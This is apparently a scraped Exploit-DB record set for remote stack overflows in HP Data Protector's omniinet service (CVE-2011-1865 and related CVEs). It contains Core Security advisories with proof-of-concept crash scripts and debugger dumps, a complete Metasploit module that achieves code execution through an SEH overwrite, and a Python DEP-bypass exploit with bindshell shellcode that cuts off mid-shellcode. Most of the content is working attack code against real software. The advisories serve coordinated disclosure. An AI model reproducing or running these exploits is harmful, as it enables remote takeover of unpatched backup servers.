*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for \"AA\"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 
LastErr ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \\. 
C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17461/"}, {"lastseen": "2016-02-02T07:54:16", "description": "HP Data Protector 6.20 - Multiple Vulnerabilities. CVE-2011-1865. Dos exploit for windows platform", "published": "2011-06-29T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EDB-ID:17458", "href": "https://www.exploit-db.com/exploits/17458/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. 
*Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the \"data protector inet\" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join([\"%s\\x00\" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\r\n\r\nfor s in args:\r\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(\">L\", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 and 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 10000 30 17\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. 
Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 42 10000 30 9\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 46 10000 30 17\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 27 10000 30 3\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerability 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 17 10000 30 6\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. 
Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 1 7 6\"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 20 1 7 6\"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 
2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. 
Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17458/"}, {"lastseen": "2016-02-02T07:55:30", "description": "HP OmniInet.exe Opcode 27 Buffer Overflow. CVE-2011-1865. 
Remote exploit for windows platform", "published": "2011-07-01T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe - Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-01T00:00:00", "id": "EDB-ID:17467", "href": "https://www.exploit-db.com/exploits/17467/", "sourceData": "##\r\n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. 
By sending a specially crafted opcode 27 packet,\r\n\t\t\t\ta remote attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 13081 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x7c35630d\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 29 2011'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn 
Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\ttrigger = rand_text_alpha_upper(10000)\r\n\t\ttrigger[4552, payload.encoded.length] = payload.encoded\r\n\t\ttrigger[5352, 8] = generate_seh_record(target.ret) \r\n\t\ttrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\r\n\r\n\t\topcode = \"27\"\r\n\r\n\t\tpacket = Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << \"\\x27\\xca\" #length\r\n\t\tpacket << \"\\xff\\xfe\\x32\"\r\n\t\tpacket << \"\\x00\\x00\\x00\"\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpacket << trigger\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \r\n\r\n\t\tprint_status(\"Trying #{target.name}...\")\r\n\t\tsock.put(packet)\r\n\t\t\r\n\t\tselect(nil,nil,nil,10)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17467/"}, {"lastseen": "2016-02-02T07:55:38", "description": "HP Data Protector 6.11 Remote Buffer Overflow DEP ROP. CVE-2011-1865. 
Remote exploit for windows platform", "published": "2011-07-02T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "EDB-ID:17468", "href": "https://www.exploit-db.com/exploits/17468/", "sourceData": "#!/usr/bin/python\r\n# HP Data Protector 6.11 Remote Buffer Overflow\r\n# Tested on Windows 2003 R2 + DEP Enabled\r\n# Authors: muts & dookie\r\n# Reference: http://www.exploit-db.com/exploits/17458/\r\n# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\n# http://www.offensive-security.com/0day/hp-dataprotector.py.txt\r\n\r\nimport struct, socket, sys\r\ntarget = sys.argv[1]\r\n\r\n# bindshell - port 4444\r\nshellcode = (\"\\xbf\\x83\\x75\\x7f\\xdd\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5e\\x33\\xc9\\xb1\"\r\n\"\\x56\\x31\\x7e\\x13\\x03\\x7e\\x13\\x83\\xee\\x7f\\x97\\x8a\\x21\\x97\\xd1\"\r\n\"\\x75\\xda\\x67\\x82\\xfc\\x3f\\x56\\x90\\x9b\\x34\\xca\\x24\\xef\\x19\\xe6\"\r\n\"\\xcf\\xbd\\x89\\x7d\\xbd\\x69\\xbd\\x36\\x08\\x4c\\xf0\\xc7\\xbc\\x50\\x5e\"\r\n\"\\x0b\\xde\\x2c\\x9d\\x5f\\x00\\x0c\\x6e\\x92\\x41\\x49\\x93\\x5c\\x13\\x02\"\r\n\"\\xdf\\xce\\x84\\x27\\x9d\\xd2\\xa5\\xe7\\xa9\\x6a\\xde\\x82\\x6e\\x1e\\x54\"\r\n\"\\x8c\\xbe\\x8e\\xe3\\xc6\\x26\\xa5\\xac\\xf6\\x57\\x6a\\xaf\\xcb\\x1e\\x07\"\r\n\"\\x04\\xbf\\xa0\\xc1\\x54\\x40\\x93\\x2d\\x3a\\x7f\\x1b\\xa0\\x42\\x47\\x9c\"\r\n\"\\x5a\\x31\\xb3\\xde\\xe7\\x42\\x00\\x9c\\x33\\xc6\\x95\\x06\\xb0\\x70\\x7e\"\r\n\"\\xb6\\x15\\xe6\\xf5\\xb4\\xd2\\x6c\\x51\\xd9\\xe5\\xa1\\xe9\\xe5\\x6e\\x44\"\r\n\"\\x3e\\x6c\\x34\\x63\\x9a\\x34\\xef\\x0a\\xbb\\x90\\x5e\\x32\\xdb\\x7d\\x3f\"\r\n\"\\x96\\x97\\x6c\\x54\\xa0\\xf5\\xf8\\x99\\x9f\\x05\\xf9\\xb5\\xa8\\x76\\xcb\"\r\n\"\\x1a\\x03\\x11\\x67\\xd3\\x8d\\xe6\\x88\\xce\\x6a\\x78\\x77\\xf0\\x8a\\x50\"\r\n\"\\xbc\\xa4\\xda\\xca\\x15\\xc4\\xb0\\x0a\\x99\\x11\\x16\\x5b\\x35\\xc9\\xd7\"\r\n\"\\x0b\\xf5\\xb9
